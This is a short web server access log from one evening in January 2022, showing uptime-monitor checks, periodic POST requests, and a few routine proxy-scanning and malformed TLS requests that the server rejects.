162.231.187.135 - - [03/Jan/2022:22:03:42 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:22:04:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:22:05:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:22:05:42 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:22:06:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jan/2022:22:07:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.231.187.135 - - [03/Jan/2022:22:07:42 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.91.246.72 - - [03/Jan/2022:22:08:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
222.186.19.235 - - [03/Jan/2022:22:09:00 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.50 Safari/525.19"
222.186.19.235 - - [03/Jan/2022:22:09:00 +0100] "GET http://fuwu.sogou.com/404/index.html HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1"
222.186.19.235 - - [03/Jan/2022:22:09:00 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [03/Jan/2022:22:09:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.119.167.107 - - [03/Jan/2022:22:09:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
162.231.187.135 - - [03/Jan/2022:22:09:43 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
